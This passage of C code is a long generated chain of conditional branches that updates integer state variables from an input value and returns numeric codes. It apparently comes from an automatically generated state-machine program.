} else if((((a14==20)&&((a1==1)&&((a28==17)&&((!(a3==1)&&((a4==17)&&((input==5)&&(((a26==17)||(a26==18))||(a26==19)))))&&(a7==1)))))&&(a25==1))){
a26 = 17;
a14 = 18;
a3 = 1;
a28 = 15;
a4 = 16;
return -1;
} else if(((a1==1)&&((a14==19)&&(((a25==1)&&((a3==1)&&((a26==18)&&(((input==5)&&(a28==17))&&!(a7==1)))))&&(a4==18))))){
a26 = 17;
a4 = 16;
a28 = 15;
a7 = 1;
a14 = 18;
return -1;
} else if((((a4==17)&&(!(a3==1)&&(((((((a26==18)&&!(a7==1))||(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(input==2))&&(a25==1))&&(a1==1))&&(a14==18))))&&(a28==17))){
a26 = 19;
a14 = 20;
a7 = 1;
a28 = 16;
return 24;
} else if((((a4==18)&&((a14==20)&&((a25==1)&&((a1==1)&&((a28==16)&&((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==5)))))))&&!(a3==1))){
a28 = 17;
a7 = 0;
a26 = 18;
a14 = 19;
a4 = 16;
a3 = 1;
return -1;
} else if((!(a3==1)&&((a14==19)&&((a25==1)&&(((a1==1)&&(((((a26==18)&&!(a7==1))||(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(input==1))&&(a4==16)))&&(a28==16)))))){
a28 = 15;
a4 = 17;
a7 = 1;
a26 = 18;
a14 = 18;
return 23;
} else if(((a4==16)&&((a28==15)&&(!(a3==1)&&(((!(a7==1)&&((((a26==19)||((a26==17)||(a26==18)))&&(input==3))&&(a25==1)))&&(a14==18))&&(a1==1)))))){
a7 = 1;
a26 = 17;
a3 = 1;
return -1;
} else if((((a1==1)&&((a3==1)&&(((a7==1)&&(((a14==18)&&(((a26==18)||(a26==19))&&(input==4)))&&(a25==1)))&&(a28==15))))&&(a4==18))){
a4 = 16;
a26 = 17;
return -1;
} else if(((a28==16)&&((a4==17)&&((((a1==1)&&((((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||((a26==17)&&!(a7==1)))&&(input==4))&&(a25==1)))&&(a14==18))&&(a3==1))))){
a26 = 18;
a28 = 15;
a7 = 0;
a4 = 18;
return 24;
} else if((!(a3==1)&&((((a1==1)&&((a25==1)&&((input==5)&&((((a7==1)&&(a26==18))&&(a14==20))||((((a26==19)&&!(a7==1))&&(a14==19))||(((a7==1)&&(a26==17))&&(a14==20)))))))&&(a28==16))&&(a4==18)))){
a14 = 19;
a4 = 17;
a26 = 17;
a7 = 0;
return -1;
} else if(((a7==1)&&(((((a25==1)&&(!(a3==1)&&((a28==16)&&((a4==17)&&(input==5)))))&&(a1==1))&&(a26==17))&&(a14==20)))){
a28 = 15;
a14 = 18;
a3 = 1;
a4 = 16;
return -1;
} else if((((((((((a14==19)&&(!(a7==1)&&(a26==19)))||(((a7==1)&&(a26==17))&&(a14==20)))&&(input==4))&&(a4==17))&&(a1==1))&&(a28==15))&&(a3==1))&&(a25==1))){
a7 = 0;
a26 = 18;
a28 = 16;
a14 = 18;
return 23;
} else if((!(a3==1)&&((((a28==17)&&((a14==18)&&((((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))||((a26==18)&&!(a7==1)))&&(input==5))&&(a1==1))))&&(a4==18))&&(a25==1)))){
a14 = 20;
a7 = 0;
a4 = 17;
a28 = 16;
a26 = 17;
return 23;
} else if(((a14==19)&&(((a4==17)&&(((a3==1)&&((((a7==1)&&(input==4))&&(a28==15))&&(a25==1)))&&(a26==18)))&&(a1==1)))){
a26 = 17;
a14 = 18;
a4 = 16;
return -1;
} else if((((a14==20)&&((((a4==17)&&(((((a26==18)&&!(a7==1))||(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))&&(input==2))&&(a25==1)))&&(a3==1))&&(a1==1)))&&(a28==17))){
a7 = 1;
a14 = 18;
a4 = 16;
a26 = 17;
a28 = 15;
return -1;
} else if((((a28==15)&&((a7==1)&&(!(a3==1)&&((a25==1)&&(((a26==19)&&((a14==20)&&(input==6)))&&(a1==1))))))&&(a4==16))){
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((a26==18)&&(((((a28==17)&&((a4==16)&&((a7==1)&&(input==6))))&&(a1==1))&&(a14==18))&&!(a3==1)))&&(a25==1))){
return -1;
} else if((((a7==1)&&(((a28==15)&&((a4==17)&&((a1==1)&&((a14==19)&&((input==3)&&(a26==18))))))&&(a25==1)))&&(a3==1))){
a14 = 18;
a26 = 17;
a4 = 16;
return -1;
} else if(((a28==17)&&((a4==18)&&((a25==1)&&(((a3==1)&&((input==3)&&(((!(a7==1)&&(a26==19))&&(a14==18))||(((a26==17)&&(a7==1))&&(a14==19)))))&&(a1==1)))))){
a14 = 18;
a7 = 0;
a26 = 19;
return 26;
} else if((((a14==20)&&(((((a4==18)&&((input==1)&&(((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))))&&(a3==1))&&(a28==16))&&(a1==1)))&&(a25==1))){
a7 = 1;
a26 = 17;
return -1;
} else if((((((a28==16)&&(((input==3)&&((((a7==1)&&(a26==17))&&(a14==19))||(((a14==18)&&((a26==18)&&!(a7==1)))||((a14==18)&&(!(a7==1)&&(a26==19))))))&&(a1==1)))&&(a25==1))&&(a4==17))&&(a3==1))){
a4 = 16;
a28 = 15;
a7 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if((((a14==19)&&(((((a1==1)&&((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==5)))&&(a4==17))&&!(a3==1))&&(a25==1)))&&(a28==17))){
a3 = 1;
a14 = 18;
a7 = 1;
a28 = 15;
a4 = 16;
a26 = 17;
return -1;
} else if((!(a7==1)&&((a1==1)&&(((a3==1)&&((a25==1)&&(((((a26==18)||(a26==19))&&(input==2))&&(a28==16))&&(a14==20))))&&(a4==17))))){
a7 = 1;
a28 = 15;
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
} else if(((!(a3==1)&&((((((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))&&(input==2))&&(a4==17))&&(a28==17))&&(a25==1))&&(a1==1)))&&(a14==19))){
a28 = 15;
a14 = 18;
a4 = 16;
a3 = 1;
a7 = 1;
a26 = 17;
return -1;
} else if((!(a3==1)&&((a28==16)&&(((a1==1)&&((((input==2)&&(((a26==18)&&!(a7==1))||(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))))&&(a14==19))&&(a25==1)))&&(a4==16))))){
a7 = 1;
a26 = 17;
a3 = 1;
a14 = 18;
a28 = 15;
return -1;
} else if(((!(a3==1)&&((a28==16)&&((((a14==19)&&((a1==1)&&((input==1)&&((a26==17)||(a26==18)))))&&(a25==1))&&(a4==16))))&&(a7==1))){
a3 = 1;
a28 = 15;
a14 = 18;
a26 = 17;
return -1;
} else if((((a1==1)&&(((a25==1)&&(((a7==1)&&(((a4==16)&&(input==2))&&!(a3==1)))&&(a14==18)))&&(a26==19)))&&(a28==15))){
a26 = 18;
a28 = 16;
a14 = 20;
return 24;
} else if(((a14==18)&&(!(a3==1)&&((((((a1==1)&&(((a26==17)||(a26==18))&&(input==5)))&&(a25==1))&&(a7==1))&&(a28==15))&&(a4==18))))){
a3 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((!(a3==1)&&((a28==17)&&(((a1==1)&&((a25==1)&&((!(a7==1)&&(input==4))&&(a14==18))))&&(a4==16))))&&(a26==18))){
a7 = 1;
a28 = 15;
a3 = 1;
a26 = 17;
return -1;
} else if(((a4==17)&&((((a26==19)&&(((((input==4)&&(a25==1))&&(a28==17))&&(a14==19))&&!(a7==1)))&&(a1==1))&&!(a3==1)))){
a3 = 1;
a7 = 1;
a28 = 15;
a26 = 17;
a14 = 18;
a4 = 16;
return -1;
} else if((((a25==1)&&((a7==1)&&((a14==19)&&((((((a26==18)||(a26==19))&&(input==5))&&(a4==16))&&(a28==17))&&!(a3==1)))))&&(a1==1))){
a26 = 18;
return 26;
} else if((!(a3==1)&&((a25==1)&&((a4==17)&&(((input==5)&&(((a14==18)&&(((a26==17)&&(a28==16))&&(a7==1)))||(((a14==20)&&(((a28==15)&&(a26==18))&&!(a7==1)))||((!(a7==1)&&((a26==19)&&(a28==15)))&&(a14==20)))))&&(a1==1)))))){
a7 = 1;
a14 = 20;
a28 = 16;
a26 = 19;
return 22;
} else if((((a25==1)&&((((a14==19)&&(((input==3)&&(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17))))&&(a1==1)))&&(a28==17))&&(a4==17)))&&!(a3==1))){
a14 = 18;
a7 = 1;
a3 = 1;
a26 = 17;
a4 = 16;
a28 = 15;
return -1;
} else if(((a4==17)&&(((a25==1)&&(((!(a7==1)&&(((input==5)&&(((a26==17)||(a26==18))||(a26==19)))&&(a14==20)))&&(a1==1))&&!(a3==1)))&&(a28==17)))){
a7 = 1;
a14 = 18;
a26 = 17;
a28 = 15;
a4 = 16;
a3 = 1;
return -1;
} else if(((a1==1)&&(((a25==1)&&((a28==17)&&((a3==1)&&((((!(a7==1)&&(a26==18))||(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(input==1))&&(a14==20)))))&&(a4==17)))){
a14 = 18;
a7 = 1;
a26 = 17;
a4 = 16;
a28 = 15;
return -1;
} else if(((a4==18)&&((a25==1)&&((a1==1)&&((a28==15)&&((((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==1))&&(a14==18))&&!(a3==1))))))){
a4 = 16;
a3 = 1;
a7 = 1;
a26 = 17;
return -1;
} else if(((a1==1)&&((a25==1)&&(((((((!(a7==1)&&((a28==15)&&(a26==18)))&&(a14==20))||((((a26==19)&&(a28==15))&&!(a7==1))&&(a14==20)))||((((a26==17)&&(a28==16))&&(a7==1))&&(a14==18)))&&(input==5))&&(a4==17))&&(a3==1))))){
a4 = 18;
a7 = 1;
a26 = 17;
a14 = 18;
a28 = 15;
return 26;
} else if((((a28==15)&&((((a25==1)&&((a4==16)&&(((((a26==17)||(a26==18))||(a26==19))&&(input==2))&&!(a3==1))))&&!(a7==1))&&(a14==18)))&&(a1==1))){
a3 = 1;
a26 = 17;
a7 = 1;
return -1;
} else if(((((((a4==17)&&((input==4)&&(((((a26==19)&&!(a7==1))&&(a14==18))||(((a26==17)&&(a7==1))&&(a14==19)))||(((a26==18)&&(a7==1))&&(a14==19)))))&&(a28==15))&&(a1==1))&&!(a3==1))&&(a25==1))){
a7 = 1;
a26 = 17;
a4 = 16;
a14 = 18;
a3 = 1;
return -1;
} else if(((a14==19)&&((a25==1)&&(((!(a7==1)&&((a4==17)&&(((input==2)&&(a28==17))&&!(a3==1))))&&(a26==19))&&(a1==1))))){
a7 = 1;
a28 = 15;
a4 = 16;
a26 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if((((a14==20)&&((a1==1)&&(((a25==1)&&((a4==18)&&((input==6)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))))&&(a28==16))))&&!(a3==1))){
a26 = 17;
a4 = 16;
a7 = 1;
a28 = 15;
a3 = 1;
return -1;
} else if((!(a7==1)&&((((!(a3==1)&&((a28==15)&&(((a4==16)&&(input==1))&&(a26==19))))&&(a1==1))&&(a14==19))&&(a25==1)))){
a14 = 18;
a26 = 18;
a28 = 17;
return 21;
} else if(((!(a3==1)&&((a1==1)&&((a7==1)&&((a25==1)&&((((input==3)&&((a26==19)||((a26==17)||(a26==18))))&&(a14==20))&&(a28==15))))))&&(a4==17))){
a26 = 17;
a28 = 16;
a7 = 0;
a14 = 19;
return -1;
} else if((!(a3==1)&&((((a14==19)&&((((a25==1)&&(((a26==17)||(a26==18))&&(input==5)))&&(a28==16))&&(a4==17)))&&(a1==1))&&!(a7==1)))){
a28 = 15;
a4 = 16;
a26 = 17;
a7 = 1;
a3 = 1;
a14 = 18;
return -1;
} else if((((a25==1)&&((!(a3==1)&&((a7==1)&&((a4==17)&&((a1==1)&&(((a26==17)||(a26==18))&&(input==5))))))&&(a14==18)))&&(a28==17))){
a26 = 17;
a28 = 15;
a4 = 16;
a3 = 1;
return -1;
} else if(((a1==1)&&((((a25==1)&&(((!(a3==1)&&(((a26==18)||(a26==19))&&(input==3)))&&(a14==18))&&(a28==16)))&&!(a7==1))&&(a4==17)))){
a7 = 1;
a28 = 15;
a4 = 16;
a3 = 1;
a26 = 17;
return -1;
} else if((((a14==20)&&(((!(a7==1)&&((a1==1)&&((a4==17)&&(((a26==18)||(a26==19))&&(input==4)))))&&(a25==1))&&(a3==1)))&&(a28==16))){
a26 = 19;
a4 = 18;
a28 = 15;
return 26;
} else if((((((a28==16)&&(((a4==18)&&((input==3)&&((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||((a26==17)&&!(a7==1)))))&&(a3==1)))&&(a25==1))&&(a14==18))&&(a1==1))){
a4 = 16;
a3 = 0;
a26 = 19;
a14 = 19;
a7 = 1;
a28 = 15;
return 26;
} else if(((a25==1)&&((a4==18)&&((a26==19)&&(((a3==1)&&((a28==16)&&(((input==1)&&(a1==1))&&(a14==18))))&&!(a7==1)))))){
a26 = 17;
a28 = 15;
a4 = 16;
a7 = 1;
return -1;
} else if((((((a3==1)&&((a1==1)&&((!(a7==1)&&((input==4)&&((a26==17)||(a26==18))))&&(a28==15))))&&(a14==19))&&(a25==1))&&(a4==18))){
a4 = 16;
a14 = 18;
a7 = 1;
a26 = 17;
return -1;
} else if(((((((((input==6)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))&&(a25==1))&&!(a3==1))&&(a14==19))&&(a4==18))&&(a1==1))&&(a28==16))){
a14 = 18;
a3 = 1;
a4 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if((((a28==15)&&((a25==1)&&((a4==17)&&(((input==1)&&(((!(a7==1)&&(a26==19))&&(a14==19))||(((a7==1)&&(a26==17))&&(a14==20))))&&(a1==1)))))&&(a3==1))){
a7 = 1;
a26 = 17;
a14 = 18;
a4 = 16;
return -1;
} else if((!(a3==1)&&(((!(a7==1)&&((((a1==1)&&((input==5)&&((a26==18)||(a26==19))))&&(a14==19))&&(a28==15)))&&(a4==18))&&(a25==1)))){
a3 = 1;
a7 = 1;
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
} else if(((a28==17)&&(((!(a3==1)&&((a4==18)&&((((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))||(!(a7==1)&&(a26==18)))&&(input==4))&&(a25==1))))&&(a1==1))&&(a14==18)))){
a4 = 16;
a26 = 18;
a7 = 1;
return 24;
} else if(((a1==1)&&(((a26==17)&&((a28==16)&&((a3==1)&&((a4==18)&&((a7==1)&&((a14==19)&&(input==3)))))))&&(a25==1)))){
a3 = 0;
a4 = 16;
a14 = 20;
a28 = 15;
return 24;
} else if((((((a25==1)&&((((a1==1)&&((input==6)&&((a26==18)||(a26==19))))&&(a14==18))&&(a4==17)))&&(a7==1))&&(a28==15))&&!(a3==1))){
a26 = 18;
return 23;
} else if((((a4==18)&&(!(a7==1)&&((a26==18)&&((a25==1)&&(((a14==18)&&((a28==15)&&(input==2)))&&(a1==1))))))&&!(a3==1))){
a7 = 1;
a26 = 17;
a3 = 1;
a4 = 16;
return -1;
} else if((((a1==1)&&((a25==1)&&(((a28==15)&&(((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==2))&&(a4==18)))&&!(a3==1))))&&(a14==19))){
a7 = 1;
a4 = 16;
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if((((((a25==1)&&((!(a3==1)&&((a4==18)&&((input==4)&&((a26==18)||(a26==19)))))&&(a14==20)))&&(a1==1))&&!(a7==1))&&(a28==16))){
a26 = 19;
return 23;
} else if(((((((a28==16)&&(((input==5)&&((!(a7==1)&&(a26==17))||(((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))))&&(a3==1)))&&(a25==1))&&(a4==18))&&(a14==19))&&(a1==1))){
a7 = 1;
a4 = 16;
a28 = 15;
a14 = 18;
a26 = 17;
return -1;
} else if((!(a7==1)&&(((((a1==1)&&(!(a3==1)&&((a25==1)&&((input==6)&&(a4==17)))))&&(a14==19))&&(a28==15))&&(a26==19)))){
a4 = 16;
a26 = 17;
a14 = 18;
a7 = 1;
a3 = 1;
return -1;
} else if(((a1==1)&&((!(a3==1)&&((((((a14==20)&&((a7==1)&&(a26==18)))||(((a14==19)&&((a26==19)&&!(a7==1)))||(((a7==1)&&(a26==17))&&(a14==20))))&&(input==6))&&(a28==16))&&(a25==1)))&&(a4==16)))){
a3 = 1;
a14 = 18;
a26 = 17;
a28 = 15;
a7 = 1;
return -1;
} else if(((a4==18)&&((a3==1)&&(((a14==18)&&(((a1==1)&&((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==6)))&&(a28==17)))&&(a25==1))))){
a4 = 16;
a28 = 16;
a3 = 0;
a26 = 18;
a7 = 1;
return 23;
} else if(((a1==1)&&((a14==18)&&(((((a4==17)&&((input==6)&&(((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))))&&(a28==17))&&(a3==1))&&(a25==1))))){
a26 = 17;
a7 = 1;
a4 = 16;
a28 = 15;
return -1;
} else if(((a1==1)&&((a7==1)&&(!(a3==1)&&((a28==15)&&((a25==1)&&(((((a26==17)||(a26==18))&&(input==4))&&(a4==16))&&(a14==20)))))))){
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((a28==16)&&((a4==17)&&((a25==1)&&((a3==1)&&(((input==1)&&((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17))))&&(a14==20))))))&&(a1==1))){
a28 = 15;
a14 = 18;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if((((((a4==17)&&((a1==1)&&(((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))&&(input==4))&&(a14==18))))&&(a3==1))&&(a28==17))&&(a25==1))){
a4 = 16;
a28 = 15;
a7 = 1;
a26 = 17;
return -1;
} else if(((a28==17)&&(((a25==1)&&((a3==1)&&((a1==1)&&((input==3)&&((((a26==19)&&!(a7==1))&&(a14==19))||(((a26==17)&&(a7==1))&&(a14==20)))))))&&(a4==18)))){
a4 = 16;
a26 = 17;
a28 = 15;
a7 = 1;
a14 = 18;
return -1;
} else if((((((((a28==15)&&(((input==1)&&(((a26==17)||(a26==18))||(a26==19)))&&(a4==18)))&&(a1==1))&&(a25==1))&&(a7==1))&&!(a3==1))&&(a14==20))){
a14 = 18;
a26 = 17;
a4 = 16;
a3 = 1;
return -1;
} else if(((a3==1)&&((a1==1)&&((a25==1)&&((((a26==17)&&((a14==20)&&((a4==18)&&(input==5))))&&!(a7==1))&&(a28==15)))))){
a4 = 16;
a14 = 18;
a7 = 1;
return -1;
} else if((((a3==1)&&((a28==16)&&((a26==18)&&((a1==1)&&(!(a7==1)&&((a25==1)&&((a14==18)&&(input==3))))))))&&(a4==18))){
a3 = 0;
a28 = 15;
a4 = 16;
a14 = 19;
return 24;
} else if(((a25==1)&&(((a4==16)&&(((input==6)&&(((((a26==17)&&(a28==17))&&(a7==1))&&(a14==18))||(((!(a7==1)&&((a26==18)&&(a28==16)))&&(a14==20))||((((a26==19)&&(a28==16))&&!(a7==1))&&(a14==20)))))&&(a1==1)))&&!(a3==1)))){
a3 = 1;
a28 = 15;
a26 = 17;
a14 = 18;
a7 = 1;
return -1;
} else if(((a25==1)&&(!(a3==1)&&((a1==1)&&((a4==16)&&((input==2)&&((((((a26==18)&&(a28==16))&&!(a7==1))&&(a14==20))||((!(a7==1)&&((a26==19)&&(a28==16)))&&(a14==20)))||((((a26==17)&&(a28==17))&&(a7==1))&&(a14==18))))))))){
a7 = 0;
a4 = 17;
a14 = 19;
a26 = 18;
a28 = 15;
return 26;
} else if(((a4==16)&&(((a25==1)&&((((a1==1)&&(((a26==18)&&(input==5))&&(a28==16)))&&(a7==1))&&(a14==18)))&&!(a3==1)))){
a28 = 17;
a7 = 0;
a14 = 19;
return 24;
} else if(((a14==20)&&((((a4==18)&&(((a26==18)&&(((input==6)&&(a28==17))&&(a1==1)))&&!(a7==1)))&&(a25==1))&&(a3==1)))){
a26 = 17;
a7 = 1;
a14 = 18;
a28 = 15;
a4 = 16;
return -1;
} else if(((((a3==1)&&((((a1==1)&&((a28==16)&&((a25==1)&&(input==4))))&&(a4==18))&&(a14==19)))&&(a26==17))&&(a7==1))){
a14 = 18;
a28 = 15;
a4 = 16;
return -1;
} else if(((((a4==17)&&((((((input==5)&&(a28==16))&&(a25==1))&&(a26==19))&&!(a7==1))&&(a1==1)))&&!(a3==1))&&(a14==19))){
a4 = 16;
a26 = 17;
a14 = 18;
a7 = 1;
a28 = 15;
a3 = 1;
return -1;
} else if(((a1==1)&&((a25==1)&&((!(a3==1)&&((a4==16)&&(((((a14==19)&&(!(a7==1)&&(a26==19)))||((a14==20)&&((a7==1)&&(a26==17))))||(((a26==18)&&(a7==1))&&(a14==20)))&&(input==3))))&&(a28==16))))){
a14 = 18;
a26 = 19;
a7 = 0;
a4 = 17;
a28 = 15;
return 26;
} else if((((((((a26==18)&&(((input==5)&&(a25==1))&&(a3==1)))&&(a7==1))&&(a28==17))&&(a4==17))&&(a1==1))&&(a14==20))){
a28 = 15;
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if(((a25==1)&&((((a4==18)&&((a28==16)&&((input==4)&&(((!(a7==1)&&(a26==19))&&(a14==18))||(((a26==17)&&(a7==1))&&(a14==19))))))&&(a1==1))&&!(a3==1)))){
a4 = 16;
a7 = 1;
a28 = 15;
a26 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if(((((((a14==18)&&((a4==18)&&(((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))||(!(a7==1)&&(a26==18)))&&(input==5))))&&(a1==1))&&(a25==1))&&!(a3==1))&&(a28==16))){
a3 = 1;
a4 = 16;
a26 = 17;
a7 = 1;
a28 = 15;
return -1;
} else if((((a25==1)&&((((((((a26==18)||(a26==19))&&(input==2))&&(a14==18))&&(a1==1))&&(a4==18))&&(a7==1))&&(a3==1)))&&(a28==15))){
a7 = 0;
a26 = 19;
a28 = 17;
return 26;
} else if(((((a25==1)&&((a1==1)&&((a4==18)&&((((!(a7==1)&&(a26==19))&&(a14==18))||((a14==19)&&((a7==1)&&(a26==17))))&&(input==5)))))&&(a28==17))&&(a3==1))){
a26 = 17;
a7 = 1;
a14 = 19;
return -1;
} else if((((((((a14==19)&&(((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))||((a26==18)&&!(a7==1)))&&(input==2)))&&(a4==17))&&(a25==1))&&(a28==15))&&(a3==1))&&(a1==1))){
a26 = 17;
a4 = 16;
a14 = 18;
a7 = 1;
return -1;
} else if((((((((a14==18)&&((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==5)))&&(a4==16))&&!(a3==1))&&(a25==1))&&(a1==1))&&(a28==16))){
a7 = 1;
a28 = 15;
a3 = 1;
a26 = 17;
return -1;
} else if((!(a7==1)&&(((a4==17)&&((((a28==15)&&((a1==1)&&((a26==17)&&(input==2))))&&(a3==1))&&(a14==20)))&&(a25==1)))){
a26 = 18;
a28 = 17;
a7 = 1;
return 24;
} else if(((((a1==1)&&(!(a3==1)&&((a14==19)&&((a4==16)&&((a26==19)&&((input==6)&&!(a7==1)))))))&&(a25==1))&&(a28==15))){
a7 = 1;
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if(((a14==19)&&(((a4==17)&&(((a25==1)&&((a1==1)&&(((input==5)&&(((a26==17)||(a26==18))||(a26==19)))&&(a7==1))))&&(a28==16)))&&!(a3==1)))){
a4 = 16;
a3 = 1;
a26 = 17;
a14 = 18;
a28 = 15;
return -1;
} else if((((((a25==1)&&(((a4==18)&&(((((a26==17)||(a26==18))||(a26==19))&&(input==6))&&(a28==15)))&&(a1==1)))&&(a7==1))&&!(a3==1))&&(a14==20))){
a26 = 17;
a4 = 16;
a3 = 1;
a14 = 18;
return -1;
} else if(((a4==16)&&((!(a3==1)&&((((((input==3)&&((a26==17)||(a26==18)))&&(a25==1))&&(a14==20))&&(a1==1))&&(a7==1)))&&(a28==15)))){
a26 = 17;
a14 = 18;
a3 = 1;
return -1;
} else if(((!(a3==1)&&((((((((a26==17)||(a26==18))&&(input==1))&&(a1==1))&&(a14==18))&&(a4==18))&&(a25==1))&&(a28==15)))&&(a7==1))){
a14 = 19;
a26 = 17;
return 24;
} else if(((a14==20)&&(((((a26==17)&&((a1==1)&&((a7==1)&&((input==2)&&!(a3==1)))))&&(a28==16))&&(a25==1))&&(a4==17)))){
a3 = 1;
a14 = 18;
a4 = 16;
a28 = 15;
return -1;
} else if((((a4==17)&&(((a3==1)&&(((input==2)&&(((((a26==18)&&!(a7==1))&&(a14==18))||((a14==18)&&((a26==19)&&!(a7==1))))||((a14==19)&&((a26==17)&&(a7==1)))))&&(a28==16)))&&(a25==1)))&&(a1==1))){
a26 = 17;
a4 = 16;
a28 = 15;
a7 = 1;
a14 = 18;
return -1;
} else if(((a28==17)&&((a25==1)&&((a3==1)&&((a14==19)&&((a1==1)&&((a4==18)&&(((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1)))&&(input==3))))))))){
a28 = 15;
a14 = 18;
a26 = 17;
a7 = 0;
return -1;
} else if(((a1==1)&&((a4==16)&&(((((!(a7==1)&&((input==5)&&((a26==17)||(a26==18))))&&(a14==20))&&(a28==15))&&!(a3==1))&&(a25==1))))){
a14 = 18;
a3 = 1;
a7 = 1;
a26 = 17;
return -1;
} else if((((a4==18)&&(((a28==15)&&((a1==1)&&((a7==1)&&((a3==1)&&((a25==1)&&(input==5))))))&&(a26==18)))&&(a14==19))){
a26 = 19;
a7 = 0;
a28 = 17;
return 24;
} else if(((((a25==1)&&(((a28==15)&&(((a26==18)&&((input==4)&&!(a3==1)))&&(a1==1)))&&(a4==18)))&&(a14==19))&&(a7==1))){
a14 = 18;
a3 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((a3==1)&&((a1==1)&&(((a4==18)&&((a28==17)&&((((a14==19)&&(!(a7==1)&&(a26==19)))||(((a26==17)&&(a7==1))&&(a14==20)))&&(input==5))))&&(a25==1))))){
a7 = 1;
a26 = 17;
a14 = 19;
return 26;
} else if(((((a4==16)&&((a26==19)&&(((a14==20)&&(!(a3==1)&&((a7==1)&&(input==5))))&&(a25==1))))&&(a1==1))&&(a28==15))){
a14 = 18;
a3 = 1;
a26 = 17;
return -1;
} else if(((a25==1)&&((a1==1)&&(((a4==17)&&((a3==1)&&((input==2)&&((((a26==19)&&!(a7==1))&&(a14==19))||(((a7==1)&&(a26==17))&&(a14==20))))))&&(a28==15))))){
a14 = 18;
a4 = 16;
a26 = 17;
a7 = 1;
return -1;
} else if((((a4==18)&&((a28==16)&&((a25==1)&&(((input==5)&&(((a14==18)&&(!(a7==1)&&(a26==19)))||((a14==19)&&((a7==1)&&(a26==17)))))&&!(a3==1)))))&&(a1==1))){
a7 = 1;
a14 = 19;
a26 = 19;
return 22;
} else if(((a25==1)&&((a28==15)&&(((a14==18)&&((a4==17)&&((((input==5)&&((a26==17)||(a26==18)))&&(a1==1))&&!(a3==1))))&&!(a7==1))))){
a26 = 17;
a14 = 19;
a28 = 16;
return -1;
} else if(((((a4==18)&&(((a28==17)&&(((((!(a7==1)&&(a26==19))&&(a14==18))||(((a26==17)&&(a7==1))&&(a14==19)))||((a14==19)&&((a26==18)&&(a7==1))))&&(input==1)))&&(a1==1)))&&!(a3==1))&&(a25==1))){
a26 = 17;
a14 = 18;
a7 = 0;
return 26;
} else if(((a25==1)&&((a1==1)&&((((((((a14==18)&&((a26==19)&&!(a7==1)))||((a14==19)&&((a26==17)&&(a7==1))))||(((a7==1)&&(a26==18))&&(a14==19)))&&(input==6))&&(a4==17))&&(a28==17))&&!(a3==1))))){
a14 = 20;
a7 = 1;
a26 = 19;
return 22;
} else if(((((a28==17)&&((a1==1)&&((a4==17)&&((input==1)&&(((a14==19)&&((a26==18)&&(a7==1)))||(((a14==18)&&(!(a7==1)&&(a26==19)))||((a14==19)&&((a7==1)&&(a26==17)))))))))&&(a25==1))&&!(a3==1))){
a26 = 17;
a3 = 1;
a4 = 16;
a14 = 18;
a7 = 1;
a28 = 15;
return -1;
} else if(((a28==15)&&((a25==1)&&((a3==1)&&(!(a7==1)&&(((((a1==1)&&(input==4))&&(a14==20))&&(a26==17))&&(a4==17))))))){
a28 = 17;
a7 = 1;
a26 = 19;
a14 = 19;
return 22;
} else if((((a25==1)&&((((a28==15)&&((a1==1)&&(!(a3==1)&&((input==1)&&((a26==17)||(a26==18))))))&&(a4==17))&&!(a7==1)))&&(a14==18))){
a28 = 17;
a7 = 1;
a4 = 16;
a26 = 18;
return -1;
} else if(((a25==1)&&((a1==1)&&((input==6)&&((((((a28==17)&&((a26==19)&&((a4==18)&&(a3==1))))&&!(a7==1))&&(a14==20))||((((a28==15)&&((!(a3==1)&&(a4==16))&&(a26==17)))&&(a7==1))&&(a14==18)))||((a14==18)&&((a7==1)&&((a28==15)&&((a26==18)&&(!(a3==1)&&(a4==16))))))))))){
a28 = 15;
a26 = 17;
a7 = 1;
a14 = 18;
a3 = 1;
a4 = 16;
return -1;
} else if(((a1==1)&&((((((a14==19)&&((a28==15)&&((a7==1)&&(input==6))))&&(a4==16))&&(a26==19))&&!(a3==1))&&(a25==1)))){
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((a25==1)&&((((((a4==17)&&((((a26==17)||(a26==18))||(a26==19))&&(input==6)))&&(a28==17))&&(a14==20))&&(a1==1))&&(a7==1)))&&!(a3==1))){
a14 = 18;
